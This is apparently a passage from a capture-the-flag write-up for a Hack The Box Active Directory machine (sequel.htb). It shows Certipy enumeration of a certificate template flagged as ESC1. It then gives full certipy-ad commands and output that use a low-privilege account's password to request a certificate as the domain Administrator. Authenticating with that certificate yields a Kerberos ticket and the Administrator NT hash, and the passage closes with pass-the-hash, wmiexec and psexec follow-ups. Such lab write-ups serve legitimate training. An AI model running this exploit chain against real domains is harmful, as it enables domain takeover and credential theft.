Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2022-11-18T21:10:22+00:00
Template Last Modified : 2024-01-19T00:26:38+00:00
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Full Control Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Property Enroll : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
[+] User Enrollable Principals : SEQUEL.HTB\Domain Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
<SNIP>Before requesting the certificate, we used certipy-ad account to pull specific information about the Administrator user. We specifically targeted the ObjectSID (S-1-5-21...-500). This is a proactive step; modern ADCS patches sometimes require a SID to be embedded in the certificate's SAN to prevent basic impersonation, and we gathered this to ensure our request would be as robust as possible.
┌──(root㉿user)-[/tmp/escape]
└─# certipy-ad account -u Ryan.Cooper -p 'NuclearMosquito3' -dc-ip $target -user 'administrator' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'Administrator':
cn : Administrator
distinguishedName : CN=Administrator,CN=Users,DC=sequel,DC=htb
name : Administrator
objectSid : S-1-5-21-4078382237-1492182817-2568127209-500
sAMAccountName : Administrator
userAccountControl : 1114624
whenCreated : 2022-11-18T17:11:51+00:00
whenChanged : 2026-03-25T05:01:30+00:00We executed the exploit using certipy-ad req to submit a certificate request over RPC. By including both the -upn administrator@sequel.htb and the -sid gathered in the previous step, we forced the Certificate Authority to issue a certificate that cryptographically binds our session to the Domain Administrator's identity. Certipy automatically handled the generation of the private key and saved the final result into a single administrator.pfx file.
┌──(root㉿user)-[/tmp/escape]
└─# certipy-ad req \
-u 'Ryan.Cooper@sequel.htb' -p 'NuclearMosquito3' \
-dc-ip $target -target 'dc.sequel.htb' \
-ca 'sequel-DC-CA' -template 'UserAuthentication' \
-upn 'administrator@sequel.htb' -sid 'S-1-5-21-4078382237-1492182817-2568127209-500'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 14
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate object SID is 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'Use certipy-ad auth to interact directly with the Domain Controller using our new certificate. This command performed the Kerberos PKINIT exchange to obtain a Ticket Granting Ticket (TGT). Crucially, because Certipy simulates a password change or a specific Kerberos sub-protocol and will aim to retrieve the Administrator's NTLM hash (a52f78...)
┌──(root㉿user)-[/tmp/escape]
└─# certipy-ad auth -pfx 'administrator.pfx' -dc-ip $target
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sequel.htb'
[*] SAN URL SID: 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4eeYou can now use the hash to authentication as the administrator (as shown above) or use wmiexec or psexec if you're in a more restrictive environment.